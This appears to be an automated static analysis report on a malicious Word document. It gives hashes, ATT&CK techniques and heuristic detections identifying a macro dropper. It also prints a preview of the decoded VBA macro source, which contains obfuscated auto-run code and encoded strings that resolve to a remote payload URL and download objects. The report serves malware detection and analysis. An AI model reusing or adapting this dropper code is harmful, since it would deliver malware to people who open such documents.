Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 451d9b57f26c0ad8…

MALICIOUS

Office (OLE)

100.0 KB Created: 2016-05-31 21:49:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 9e40f86b1e1e41d50069edc46a1130dc SHA-1: 78baca3dbc78ffb6fe584c0243da1fecd00d7b93 SHA-256: 451d9b57f26c0ad8a20d9d34062cdee5a317830a64bd2c20b249ec4d2aadd800
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, specifically triggering a Document_Open macro. Heuristics indicate the use of CreateObject and CallByName, common for executing arbitrary code. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this document acts as a dropper for further malicious content. No specific URLs or executable payloads were directly extracted, but the macro's intent is to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18505 bytes
SHA-256: c504e20e2cbfcf9dd6040dfad6a6a9ee664322dc0122ccbb406d320b3d3f9edf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub jQzYdsa(ByVal WXQZvb As String, ByVal vKSkJF As Integer)
eBVed True, "W1xQOMpd4TxQ", 9044
BgpuaY "0jY9Fmj2Pj", "hpMFZLDOcZMT3Ri"
pKmAp
QzbLZUfVjo = 6741
If cjAPyuUs("7M0Gpv1Q6BSiN", 886, 440) Then
ANvHoNmNQIT = 9024
TArUZm
fhQBcVDPD 1883
rdGijfk = 3192
KEaqCaY "2HIIyMUMwwrJ"
tvygeconED = "oqKfJ5sdaBT"
Else
EufKsRetxee 653, 5024, 4694
wCiHGhCsEYPmX "OafLmaqp6qQ0nth", 9258
CEEQfwy
YmResu = False
End If
End Sub
Private Sub FVqPtVzLbBiW(ByVal LLFnybnFfKW As Integer)
ObRkBZUGFSz "r30mYZCNv5", "g1GOUEScdTkBpdr", "N79vMn0STl"
TXOwdM = 358
RjQhRtmUHFBkf
UUvhUelCObJDu = "PNDguUKzwrpWZ"
If iCNAKmtDnfb(True, 55, True) Then
rEwZafNTf = 4069
UkHLdwxvHAb 555, "cy4qgDjlwx", 2131
hoUcwrywoXm = "BO59agtL35F2eGF"
tfyXoynAv
Else
QtZpFE
HDncKyvZC 9355
bhmXXPfDA = "YqLLvZ4M1VtEl"
End If
End Sub
Private Sub Document_Open()
Dim ZhJRcqudJckpG As Integer
Dim TcvXahI As Boolean
bTaRXUr.CHdZBeaOOeuX
End Sub

Attribute VB_Name = "bTaRXUr"
Private Sub vxBICXigh(ByVal bHwOgPgCT As String, ByVal rGBbIWxCwk As String)
LgYZkTEWf "D0dsLwg1he"
FXMcChnBHii = "XIOVaaU1x2X"
vahYr "RQ3K5kpZLK", "8HWGKTntgvL6qb", True
End Sub
Private Sub enkyImFRCE(ByVal jVTYoN As Integer, ByVal ALVnvrW As String)
CHrIDxARkqeMVO 3110
xdtSRaIXuqiKau = 6371
bqhOfXZt "S3nApXdu4Rypwu1", "UnZSUQba20eazHl"
pLteHzjvhtWwe = True
MbNoALQ
End Sub
Private Sub KaQctHz(ByVal XigcJDDxhVwOxC As String, ByVal NTqsuxlmZFHhl As Boolean)
xKCuSaT
wksgysDMQQ
jEDVAQKo
End Sub
Public Function ZzcNKRodGvNXQS(ByVal XdsMxJiEMe As String, ByVal nsuawmYJ As String) As Object
Dim JiAmtcnqIXj As Integer
Dim aLOaKchd As String
Set ZzcNKRodGvNXQS = mlYjsryiiku(CreateObject(XdsMxJiEMe))
End Function
Public Sub CHdZBeaOOeuX()
Dim iWiKKJCNCaNVOb As String
Dim Veaqx As Integer
On Error GoTo UsCufD
HzatHdrlntM.XKcrcq
HzatHdrlntM.AfTFSWrb
ttnVyucDd
Exit Sub
UsCufD:
End Sub
Private Sub tKTMCDETD(ByVal ydgKSrLAEgVv As String)
plJSEfhf = "EdYL5na0cJUYxo"
If qbWCOqqMP Then
nXByjO False, "4rJeWY2Rl3VZt"
ZKrwvTBaaXmuD
OCvPUlmwtBOXa True
Else
fHqyT 2123
End If
JGjLLOAtjgzofs "sqQWmVQA8", 972
End Sub
Private Function mlYjsryiiku(ByVal OnPXzVsp As Object) As Object
Dim ZWploe As Integer
Set mlYjsryiiku = OnPXzVsp
End Function
Private Sub nUtxIKXiV(ByVal pCaCN As String, ByVal lbXnqGWlg As String, ByVal oIUEmStVomKRL As String)
Set oWcVpImwU = qFeEnQQlu.nLQKikhdTHVeQ(True, oIUEmStVomKRL)
qFeEnQQlu.sQKUvGR wcOlVHXzJYfry, 2670, "HrklKlpxp4Rbh", oWcVpImwU
HzuLtqmj.xfMSRUhFMoMfT gPwHsAClqtMcSA.LZzmvBgbVHUG(jBdZR, oWcVpImwU, 8879), False, "fzxoudqqXa4ZNqC", pCaCN
End Sub
Private Sub ttnVyucDd()
Dim ZHMiHEZXATB As Boolean
nUtxIKXiV HzuLtqmj.vFLBWmnEugY, "RwXOs4QSZ", jfiHEeJIxc
HzuLtqmj.NCIRyjbbVyjeWu False, 618, HzuLtqmj.vFLBWmnEugY
End Sub
Private Function wcOlVHXzJYfry() As String
wcOlVHXzJYfry = faktSoyQZsugY.wUlVPgPht("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function jBdZR() As String
jBdZR = faktSoyQZsugY.wUlVPgPht("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function jfiHEeJIxc() As String
jfiHEeJIxc = faktSoyQZsugY.wUlVPgPht("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "faktSoyQZsugY"
Private Function UomUvsvyC(ByVal ejOsbUk As Integer, ByVal ZTOoxPL As Integer, ByVal looMAGbKjgM As String, ByVal GJjopCUTbk As String) As String
If Not FuEeeCR.rAcvlfxsVCQZyr(GJjopCUTbk, False, False, looMAGbKjgM) Then
UomUvsvyC = GJjopCUTbk
End If
End Function
Private Function dnWuE(ByVal UepDAMzNzgw As String) As String
FFUcJAXpZjKY
stJPRDBDbl = False
PofHxzJigwOatN
dnWuE = "wfks2vMRSS4eT1"
End Function
Public Function wUlVPgPht(ByVal yMlhb As String, ByVal bjHZSzSZ As String) 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.